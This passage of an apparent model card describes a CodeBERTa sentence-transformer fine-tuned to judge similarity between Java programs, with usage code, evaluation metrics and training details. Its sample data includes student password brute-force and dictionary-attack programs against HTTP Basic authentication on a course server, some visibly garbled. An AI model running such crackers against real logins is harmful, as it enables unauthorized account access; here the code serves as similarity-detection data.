, userNamePasswordBase64(uname,pword));\n conn.connect ();\n return conn.getInputStream();\n\
\ }\n\n\n public String userNamePasswordBase64(String username, String password)\
\ {\n return \" \" + base64Encode (username + \":\" + password);\n }\n\
\n private final static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E',\
\ 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q',\
\ 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',\
\ 'f',\n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q',\
\ 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n \
\ '4', '5', '6', '7', '8', '9', '+', '/'\n };\n\n private static String\
\ base64Encode (String string) {\n String encodedString = \"\";\n byte\
\ bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while\
\ (i < bytes.length) {\n byte b1 = bytes [i++];\n byte b2;\n \
\ byte b3;\n if (i >= bytes.length) {\n b2 = 0;\n b3\
\ = 0;\n pad = 2;\n }\n else {\n b2 = bytes [i++];\n\
\ if (i >= bytes.length) {\n b3 = 0;\n pad =\
\ 1;\n }\n else\n b3 = bytes [i++];\n \
\ }\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3)\
\ << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n\
\ byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n\
\ encodedString += base64Array [c2];\n switch (pad) {\n case\
\ 0:\n encodedString += base64Array [c3];\n encodedString +=\
\ base64Array [c4];\n break;\n case 1:\n encodedString\
\ += base64Array [c3];\n encodedString += \"=\";\n break;\n\
\ case 2:\n encodedString += \"==\";\n break;\n \
\ }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public\
\ static void main(String args[]) \n {\n String s = null;\n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n\n \n String\
\ alphabets = new String(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n \n String password = null;\n int len = 0;\n int num_tries\
\ = 0;\n\n len = alphabets.length();\n \n \n for (int i=0;\
\ i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n \
\ for (int k=0; k<len; k++)\n\t {\n try \n {\n\
\ \n password = String.valueOf(alphabets.charAt(i))\
\ + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n\
\ \n System.out.print(alphabets.charAt(i)); \n\
\ System.out.print(alphabets.charAt(j)); \n \
\ System.out.println(alphabets.charAt(k)); \n\n \n \
\ Process p = Runtime.getRuntime().exec(\"wget --http-user= --http-passwd=\"\
\ + password + \" \" + basic_url);\n \n BufferedReader\
\ stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n\
\ while ((s = stdInput.readLine()) != null)\n \
\ {\n System.out.println(s);\n }\n \
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n\
\ }\n \n try\n\t\t {\n\
\ p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n\n \
\ num_tries++;\n \n if((p.exitValue())\
\ == 0)\n { \n System.out.println(\"\
**********PASSWORD IS: \" + password);\n\t System.out.println(\"**********NUMBER\
\ OF TRIES: \" + num_tries);\n System.exit(1);\n \
\ }\n }\n catch (IOException e)\n \
\ {\n System.out.println(\"exception happened - here's\
\ what I know: \");\n e.printStackTrace();\n \
\ System.exit(-1);\n }\n }\n }\n }\n \
\ }\n}\n\n"
- "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport java.io.*;\n\
import java.net.*;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport\
\ java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[]\
\ args) throws IOException {\n\n \n int start , end, total;\n start\
\ = System.currentTimeMillis(); \n\n String username = \"\";\n String\
\ password = null;\n String host = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n \n \n String letters = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n int lettersLen = letters.length(); \n int passwordLen=3; \n\n \
\ int passwords=0; \n int twoChar=0; \n\n url.misc.BASE64Encoder\
\ base = new url.misc.BASE64Encoder();\n \n\n \n String authenticate\
\ = \"\"; \n String realm = null, domain = null, hostname = null;\n \
\ header = null; \n\n \n int responseCode;\n String responseMsg;\n\
\n \n int temp1=0;\n int temp2=0;\n int temp3=0;\n\n\n \
\ \n \n \n for (int a=1; a<=passwordLen; a++) {\n temp1\
\ = (int) Math.pow(lettersLen, a);\n passwords += temp1;\n if\
\ (a==2) {\n twoChar = temp1; \n }\n }\n\n System.out.println(\"\
Brute Attack \" + host + \" has commenced.\");\n System.out.println(\"Number\
\ of possible password combinations: \" + passwords);\n\n\n int i=1; \n\n\
\ {\n try {\n \n URL url = new URL(host);\n\
\ HttpURLConnection httpConnect = (HttpURLConnection) url.openConnection();\n\
\n \n if(realm != null) {\n\n \n \
\ if ( i < lettersLen) {\n \n\n password\
\ = letters.substring(i, (i+1));\n\n } else if (i < (lettersLen\
\ + twoChar)) {\n \n\n \n \
\ temp1 = i / lettersLen;\n password = letters.substring((-1),\
\ start );\n\n \n temp1 = i - ( temp1 * lettersLen);\n\
\ password = password + letters.substring(temp1, (+1));\n\n\
\ } else {\n \n\n \n \
\ temp2 = i / lettersLen;\n temp1 = i - (temp2 *\
\ lettersLen);\n password = letters.substring(temp1, (+1));\n\
\n \n temp3 = temp2; \n \
\ temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n\
\ password = letters.substring(temp1, (+1)) + password;\n\n\
\ \n temp3 = temp2; \n temp2\
\ = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n\
\ password = letters.substring(temp1, (+1)) + password;\n\n\
\ } \n\n \n \n authenticate\
\ = username + \":\" + password;\n authenticate = new String(base.encode(authenticate.getBytes()));\n\
\ httpConnect.addRequestProperty(\"Authorization\", \" \" + authenticate);\n\
\n } \n\n \n httpConnect.connect();\n\n \
\ \n realm = httpConnect.getHeaderField(\"WWW-Authenticate\"\
);\n if (realm != null) {\n realm = realm.substring(realm.indexOf('\"\
') + 1);\n realm = realm.substring(0, realm.indexOf('\"'));\n \
\ }\n\n hostname = url.getHost();\n\n \n \
\ responseCode = httpConnect.getResponseCode();\n responseMsg\
\ = httpConnect.getResponseMessage();\n\n \n \n \
\ \n \n \n\n \n \n if\
\ (responseCode == 200) {\n \n end = System.currentTimeMillis();\n\
\ total = (end - start) / 1000; \n\n System.out.println\
\ (\"Sucessfully Connected \" + url);\n System.out.println(\"Login\
\ Attempts Required : \" + (i-1));\n System.out.println(\"Time Taken\
\ in Seconds : \" + total);\n System.out.println (\"Connection Status\
\ : \" + responseCode + \" \" + responseMsg);\n System.out.println\
\ (\"Username : \" + username);\n System.out.println (\"Password\
\ : \" + password);\n System.exit( 0 );\n } else if (responseCode\
\ == 401 && realm != null) {\n \n \n \
\ \n if (i > 1) {\n\n }\n } else {\n \
\ \n \n System.out.println (\"What the?...\
\ The server replied with unexpected reponse.\" );\n System.out.println\
\ (\" Unexpected Error Occured While Attempting Connect \" + url);\n \
\ System.out.println (\"Connection Status: \" + responseCode + responseMsg);\n\
\ System.out.println (\"Unfortunately the password could not recovered.\"\
);\n System.exit( 0 );\n }\n\n i++;\n\n \
\ } catch(MalformedURLException e) {\n System.out.println(\"Opps,\
\ the URL \" + host + \" is not valid.\");\n System.out.println(\"Please\
\ check the URL and try again.\");\n } catch(IOException e) {\n \
\ System.out.println(\", 't connect \" + host + \".\");\n System.out.println(\"\
Please check the URL and try again.\");\n System.out.println(\"Other\
\ possible causes include website is currently unavailable\");\n System.out.println(\"\
\ have internet connection problem.\");\n } \n\n } while(realm !=\
\ null); \n\n\n }\n}"
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- cosine_accuracy
- cosine_accuracy_threshold
- cosine_f1
- cosine_f1_threshold
- cosine_precision
- cosine_recall
- cosine_ap
- cosine_mcc
model-index:
- name: SentenceTransformer based on huggingface/CodeBERTa-small-v1
results:
- task:
type: binary-classification
name: Binary Classification
dataset:
name: binary classification evaluator
type: binary-classification-evaluator
metrics:
- type: cosine_accuracy
value: 0.999534450651769
name: Cosine Accuracy
- type: cosine_accuracy_threshold
value: 0.8751956224441528
name: Cosine Accuracy Threshold
- type: cosine_f1
value: 0.9995346672871103
name: Cosine F1
- type: cosine_f1_threshold
value: 0.8751956224441528
name: Cosine F1 Threshold
- type: cosine_precision
value: 0.9990697674418605
name: Cosine Precision
- type: cosine_recall
value: 1.0
name: Cosine Recall
- type: cosine_ap
value: 0.9999512493871627
name: Cosine Ap
- type: cosine_mcc
value: 0.9990693343726054
name: Cosine Mcc
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
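The pooling module averages the token embeddings produced by the transformer, weighted by the attention mask, to yield one 768-dimensional vector per input. A minimal sketch of that mean-pooling step (not the library's exact implementation):
```python
import torch

def mean_pool(token_embeddings: torch.Tensor, attention_mask: torch.Tensor) -> torch.Tensor:
    """Average the real (non-padding) token vectors into one sentence vector."""
    # token_embeddings: (batch, seq_len, 768); attention_mask: (batch, seq_len)
    mask = attention_mask.unsqueeze(-1).to(token_embeddings.dtype)
    summed = (token_embeddings * mask).sum(dim=1)   # sum over real tokens only
    counts = mask.sum(dim=1).clamp(min=1e-9)        # number of real tokens per input
    return summed / counts                          # (batch, 768)
```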
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1")
# Run inference
sentences = [
'\n\nimport java.io.*;\nimport java.net.*;\nimport java.misc.BASE64Encoder;\n\npublic class Dictionary\n{\n public Dictionary()\n {}\n\n public boolean fetchURL(String urlString,String username,String password)\n {\n StringWriter sw= new StringWriter();\n PrintWriter pw = new PrintWriter();\n try{\n URL url=new URL(urlString); \n String userPwd= username+":"+password;\n\n \n \n \n \n\n BASE64Encoder encoder = new BASE64Encoder();\n String encodedStr = encoder.encode (userPwd.getBytes());\n System.out.println("Original String = " + userPwd);\n\t System.out.println("Encoded String = " + encodedStr);\n\n HttpURLConnection huc=(HttpURLConnection) url.openConnection(); \n huc.setRequestProperty( "Authorization"," "+encodedStr); \n InputStream content = (InputStream)huc.getInputStream();\n BufferedReader in =\n new BufferedReader (new InputStreamReader (content));\n String line;\n while ((line = in.readLine()) != null) {\n pw.println (line);\n System.out.println("");\n System.out.println(sw.toString());\n }return true;\n } catch (MalformedURLException e) {\n pw.println ("Invalid URL");\n return false;\n } catch (IOException e) {\n pw.println ("Error URL");\n return false;\n }\n\n }\n\n public void getPassword()\n {\n String dictionary="words";\n String urlString="http://sec-crack.cs.rmit.edu./SEC/2/";\n String login="";\n String pwd=" ";\n\n try\n {\n BufferedReader inputStream=new BufferedReader(new FileReader(dictionary));\n startTime=System.currentTimeMillis();\n while (pwd!=null)\n {\n pwd=inputStream.readLine();\n if(this.fetchURL(urlString,login,pwd))\n {\n finishTime=System.currentTimeMillis();\n System.out.println("Finally I gotta it, password is : "+pwd);\n System.out.println("The time for cracking password is: "+(finishTime-startTime) + " milliseconds");\n System.exit(1);\n } \n\n }\n inputStream.close();\n }\n catch(FileNotFoundException e)\n {\n System.out.println("Dictionary not found.");\n }\n catch(IOException e)\n {\n System.out.println("Error dictionary");\n }\n }\n\n public static void main(String[] arguments)\n {\n BruteForce bf=new BruteForce();\n bf.getPassword();\n } \n}',
'\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public static void main(String args[]) \n {\n String s = null;\n String basic_url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n \n String alphabets = new String("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ");\n \n String password = null;\n int len = 0;\n int num_tries = 0;\n\n len = alphabets.length();\n \n \n for (int i=0; i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n for (int k=0; k<len; k++)\n\t {\n try \n {\n \n password = String.valueOf(alphabets.charAt(i)) + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n \n System.out.print(alphabets.charAt(i)); \n System.out.print(alphabets.charAt(j)); \n System.out.println(alphabets.charAt(k)); \n\n \n Process p = Runtime.getRuntime().exec("wget --http-user= --http-passwd=" + password + " " + basic_url);\n \n BufferedReader stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\n BufferedReader stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\n \n while ((s = stdInput.readLine()) != null)\n {\n System.out.println(s);\n }\n \n \n while ((s = stdError.readLine()) != null)\n {\n System.out.println(s);\n }\n \n try\n\t\t {\n p.waitFor(); \n }\n catch (InterruptedException g) \n {\n } \n\n num_tries++;\n \n if((p.exitValue()) == 0)\n { \n System.out.println("**********PASSWORD IS: " + password);\n\t System.out.println("**********NUMBER OF TRIES: " + num_tries);\n System.exit(1);\n }\n }\n catch (IOException e)\n {\n System.out.println("exception happened - here\'s what I know: ");\n e.printStackTrace();\n System.exit(-1);\n }\n }\n }\n }\n }\n}\n\n',
'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) throws IOException {\n\n \n int start , end, total;\n start = System.currentTimeMillis(); \n\n String username = "";\n String password = null;\n String host = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n \n \n String letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n int lettersLen = letters.length(); \n int passwordLen=3; \n\n int passwords=0; \n int twoChar=0; \n\n url.misc.BASE64Encoder base = new url.misc.BASE64Encoder();\n \n\n \n String authenticate = ""; \n String realm = null, domain = null, hostname = null;\n header = null; \n\n \n int responseCode;\n String responseMsg;\n\n \n int temp1=0;\n int temp2=0;\n int temp3=0;\n\n\n \n \n \n for (int a=1; a<=passwordLen; a++) {\n temp1 = (int) Math.pow(lettersLen, a);\n passwords += temp1;\n if (a==2) {\n twoChar = temp1; \n }\n }\n\n System.out.println("Brute Attack " + host + " has commenced.");\n System.out.println("Number of possible password combinations: " + passwords);\n\n\n int i=1; \n\n {\n try {\n \n URL url = new URL(host);\n HttpURLConnection httpConnect = (HttpURLConnection) url.openConnection();\n\n \n if(realm != null) {\n\n \n if ( i < lettersLen) {\n \n\n password = letters.substring(i, (i+1));\n\n } else if (i < (lettersLen + twoChar)) {\n \n\n \n temp1 = i / lettersLen;\n password = letters.substring((-1), start );\n\n \n temp1 = i - ( temp1 * lettersLen);\n password = password + letters.substring(temp1, (+1));\n\n } else {\n \n\n \n temp2 = i / lettersLen;\n temp1 = i - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1));\n\n \n temp3 = temp2; \n temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1)) + password;\n\n \n temp3 = temp2; \n temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1)) + password;\n\n } \n\n \n \n authenticate = username + ":" + password;\n authenticate = new String(base.encode(authenticate.getBytes()));\n httpConnect.addRequestProperty("Authorization", " " + authenticate);\n\n } \n\n \n httpConnect.connect();\n\n \n realm = httpConnect.getHeaderField("WWW-Authenticate");\n if (realm != null) {\n realm = realm.substring(realm.indexOf(\'"\') + 1);\n realm = realm.substring(0, realm.indexOf(\'"\'));\n }\n\n hostname = url.getHost();\n\n \n responseCode = httpConnect.getResponseCode();\n responseMsg = httpConnect.getResponseMessage();\n\n \n \n \n \n \n\n \n \n if (responseCode == 200) {\n \n end = System.currentTimeMillis();\n total = (end - start) / 1000; \n\n System.out.println ("Sucessfully Connected " + url);\n System.out.println("Login Attempts Required : " + (i-1));\n System.out.println("Time Taken in Seconds : " + total);\n System.out.println ("Connection Status : " + responseCode + " " + responseMsg);\n System.out.println ("Username : " + username);\n System.out.println ("Password : " + password);\n System.exit( 0 );\n } else if (responseCode == 401 && realm != null) {\n \n \n \n if (i > 1) {\n\n }\n } else {\n \n \n System.out.println ("What the?... The server replied with unexpected reponse." 
);\n System.out.println (" Unexpected Error Occured While Attempting Connect " + url);\n System.out.println ("Connection Status: " + responseCode + responseMsg);\n System.out.println ("Unfortunately the password could not recovered.");\n System.exit( 0 );\n }\n\n i++;\n\n } catch(MalformedURLException e) {\n System.out.println("Opps, the URL " + host + " is not valid.");\n System.out.println("Please check the URL and try again.");\n } catch(IOException e) {\n System.out.println(", \'t connect " + host + ".");\n System.out.println("Please check the URL and try again.");\n System.out.println("Other possible causes include website is currently unavailable");\n System.out.println(" have internet connection problem.");\n } \n\n } while(realm != null); \n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.2589, 0.2759],
# [0.2589, 1.0000, 0.2076],
# [0.2759, 0.2076, 1.0000]])
```
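Because the training pairs are Java programs labeled as similar or not, one natural application is flagging near-duplicate submissions in a collection. Below is a minimal sketch using the library's `paraphrase_mining` utility; the snippets and the 0.9 cut-off are illustrative assumptions, not values taken from the training data:
```python
from sentence_transformers import SentenceTransformer
from sentence_transformers.util import paraphrase_mining

model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1")

# Illustrative Java snippets; in practice these would be whole source files.
programs = [
    "public class A { public static void main(String[] a) { System.out.println(1); } }",
    "public class B { public static void main(String[] a) { System.out.println(1); } }",
    "public class C { int add(int x, int y) { return x + y; } }",
]

# paraphrase_mining returns [score, i, j] triples sorted by decreasing cosine similarity.
for score, i, j in paraphrase_mining(model, programs):
    if score >= 0.9:  # assumed cut-off; tune it on held-out labeled pairs
        print(f"programs {i} and {j} look similar (cosine {score:.3f})")
```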
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
## Evaluation
### Metrics
#### Binary Classification
* Dataset: `binary-classification-evaluator`
* Evaluated with [<code>BinaryClassificationEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.BinaryClassificationEvaluator)
| Metric | Value |
|:--------------------------|:--------|
| cosine_accuracy | 0.9995 |
| cosine_accuracy_threshold | 0.8752 |
| cosine_f1 | 0.9995 |
| cosine_f1_threshold | 0.8752 |
| cosine_precision | 0.9991 |
| cosine_recall | 1.0 |
| **cosine_ap** | **1.0** |
| cosine_mcc | 0.9991 |
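To run this style of evaluation on your own labeled pairs, the same evaluator can be applied directly. A minimal sketch, where the pairs and labels below are made up for illustration (label 1 = similar/derived program, 0 = unrelated):
```python
from sentence_transformers import SentenceTransformer
from sentence_transformers.evaluation import BinaryClassificationEvaluator

model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1")

# Hypothetical labeled pairs for demonstration purposes only.
sentences1 = ["class A { void f() {} }", "class B { int x; }"]
sentences2 = ["class A2 { void f() {} }", "class C { String s; }"]
labels = [1, 0]

evaluator = BinaryClassificationEvaluator(sentences1, sentences2, labels, name="my-eval")
print(evaluator(model))  # cosine accuracy, F1, precision, recall, AP, MCC
```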
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 77,328 training samples
* Columns: <code>text_1</code>, <code>text_2</code>, and <code>label</code>
* Approximate statistics based on the first 1000 samples:
| | text_1 | text_2 | label |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------|
| type | string | string | int |
| details | <ul><li>min: 51 tokens</li><li>mean: 467.45 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.45 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~50.00%</li><li>1: ~50.00%</li></ul> |
* Samples:
| text_1 | text_2 | label |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code>1</code> |
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> | <code>0</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code>1</code> |
* Loss: [<code>ContrastiveLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#contrastiveloss) with these parameters:
```json
{
"distance_metric": "SiameseDistanceMetric.COSINE_DISTANCE",
"margin": 0.5,
"size_average": true
}
```
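For reference, a minimal sketch of instantiating this loss directly in Sentence Transformers with the parameters listed above (the model path is a placeholder):

```python
from sentence_transformers import SentenceTransformer, losses

model = SentenceTransformer("path/to/base/model")  # placeholder
train_loss = losses.ContrastiveLoss(
    model=model,
    distance_metric=losses.SiameseDistanceMetric.COSINE_DISTANCE,
    margin=0.5,
    size_average=True,
)
```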
### Evaluation Dataset
#### Unnamed Dataset
* Size: 8,592 evaluation samples
* Columns: <code>text_1</code>, <code>text_2</code>, and <code>label</code>
* Approximate statistics based on the first 1000 samples:
| | text_1 | text_2 | label |
|:--------|:------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------|
| type | string | string | int |
| details | <ul><li>min: 51 tokens</li><li>mean: 469.8 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 461.39 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~50.00%</li><li>1: ~50.00%</li></ul> |
* Samples:
| text_1 | text_2 | label |
